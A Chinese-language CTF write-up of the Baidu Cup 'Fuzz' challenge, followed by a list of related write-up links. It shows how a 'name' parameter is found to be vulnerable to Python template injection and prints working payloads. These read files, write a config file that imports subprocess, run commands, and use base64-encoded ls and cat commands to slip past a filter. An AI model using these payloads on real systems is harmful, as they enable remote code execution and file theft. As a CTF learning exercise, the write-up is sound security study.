“百度杯”CTF比赛 十一月场Fuzz
题目提示plz fuzz parameter
用burp跑一下参数,得到参数是name
访问
一般到这一步我会尝试注入,但是会发现会一直回显输入的值,转而考虑是否为python模板注入,进行测试:证明是python注入无疑
进行文件读取:
/?name={{%27%27.__class__.__mro__[2].__subclasses__()[40](/etc).read()}}
到这里想尝试使用命令执行语句,但是发现被过滤,思路到这里结束,参考大佬wp:i春秋Fuzz - 走看看
知道这里需要向SSTI漏洞注入
利用公开的payload命令执行
name=%7B%7B ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') %7D%7D
解释:向远程服务器写入一个文件,当编译完成为subprocess模块引入check_output方法,并将其设置指向变量RUNCMD
name=%7B%7B config.from_pyfile('/tmp/owned.cfg') %7D%7D
解释:向config对象添加一个新项
name=%7B%7B%20config[%27RUNCMD%27](%27/usr/bin/id%27,shell=True)%20%7D%7D
解释:通过向SSTI漏洞注入来检测是否成功
后面利用ls进行文件读取,打算发现被过滤,这里利用base64编码在解码进行绕过
?name={{ config['RUNCMD']('`echo bHMK | base64 -d`',shell=True) }}
接下来ls al读取文件
?name={{ config['RUNCMD']('`echo bHMgLWFsCg== | base64 -d`',shell=True) }}
接下来就可以利用ls var/www/html读取
?name={{ config['RUNCMD']('`echo bHMgLWFsIC92YXIvd3d3L2h0bWwK | base64 -d`',shell=True) }}
看到有fl4g这个文件,对其进行读取
?name={{ config['RUNCMD']('`echo Y2F0IC92YXIvd3d3L2h0bWwvZmw0Zwo= | base64 -d`',shell=True) }}
“百度杯”CTF比赛 十一月场Fuzz相关推荐
- “百度杯”CTF比赛 十一月场Look
最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...
- “百度杯”CTF比赛 十一月场Mangager
此题前半部分分析见"百度杯"CTF比赛 十一月场 题目名称:Mangager_CodeRoc的博客-CSDN博客 每日CTF Web:Mangager_LUV_YOUJUN的博客- ...
- “百度杯”CTF比赛 十一月场 - 敲击
题目内容: 方方格格,不断敲击 "wdvtdz qsxdr werdzxc esxcfr uygbn" flag格式为:flag{小写的字符串} 解题思路 密文全是小写字母,提示是 ...
- “百度杯”CTF比赛 十一月场 - 贝丝家族
题目内容: 我喜欢贝丝,但是贝丝的表妹喜欢我 还给了我一封情诗 MZWGCZ33MVZGQZLJL5STQOJTGRPWK4SVJ56Q==== 解题思路 由于结尾有四个 = ,所以不再可能是 Bas ...
- “百度杯”CTF比赛 十一月场 - 嘀嘀嘀
题目内容: --. .-- .- --. . --- .---- -.-. .- - -.-. -- --- --- -- -- ----. --- -- -- .- --- --- ----. -- ...
- “百度杯”CTF比赛 十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝 我要变成一只程序员 剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题 泄露的数据 考眼 ...
- “百度杯”CTF比赛 九月场--web Upload
"百度杯"CTF比赛 九月场--web Upload 基础知识 1.什么是一句话木马? 2.一句话木马的简要原理 3.html渲染过程 解析渲染该过程主要分为以下步骤 解决方案 4 ...
- [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...
- “百度杯”CTF比赛 十月场 Login
"百度杯"CTF比赛 十月场 Login 1 进去就是一个长得还可以的登入界面,查看源码没看到注释,以为没有,开始对其进行sql注入测试,在 burp suite多次尝试,没找到注 ...
最新文章
- 希尔排序算法实现思想个人理解
- Linux的mmap内存映射机制解析
- 批改网禁止粘贴怎么破_重大利好!教育部声明,要求家长批改作业等行为,发现一起严处一起...
- 程序员经典面试题,高并发系统,一般需要怎么做
- Web前端笔记-通过Thymeleaf把数组传输给echarts并显示曲线图
- 城市APP集成Firebase/Admob/增强现实带PHP管理后台
- 分布式、集群的概念、区别
- (92)低速接口UART、IIC、SPI介绍,面试必问(十六)(第19天)
- dmg镜像如何写入u盘_手把手教你制作Linux系统安装U盘,小白都能轻松上手
- 如何用Postman mock服务?
- Java包范围可见性
- 15款非常有用的前端开发CSS网格(grid system)生成器
- matlab安装与下载
- 为股票量化分析最新整理的免费股票数据API接口
- 科研画图都用什么软件?
- 真的不明白,怎么会这样!
- android:报Activity has leaked IntentReceiver或者re...
- Databricks:打造数据国度的“金砖四国”
- 5.4 微程序控制器
- TortoiseSvn介绍
热门文章
- 伦敦国王学院计算机读研要求,伦敦国王学院高级计算机理学硕士
- net core mysql开源框架_.NetCore开源集成框架
- 让笔记本触摸板默认关闭
- js new Date() 当前时间/指定时间转换为时间戳
- 新元宇宙每周连载《地球人奇游天球记》第十三回火星烧烤
- Java自定义连接池
- html如何读取pdf,html页面读取PDF小案例
- STM32_iC-MHM磁编码器使用
- WEB电商项目广告管理与缓存解决方案
- USF MSDS501 计算数据科学中文讲义 2.4 Python 中的编程模式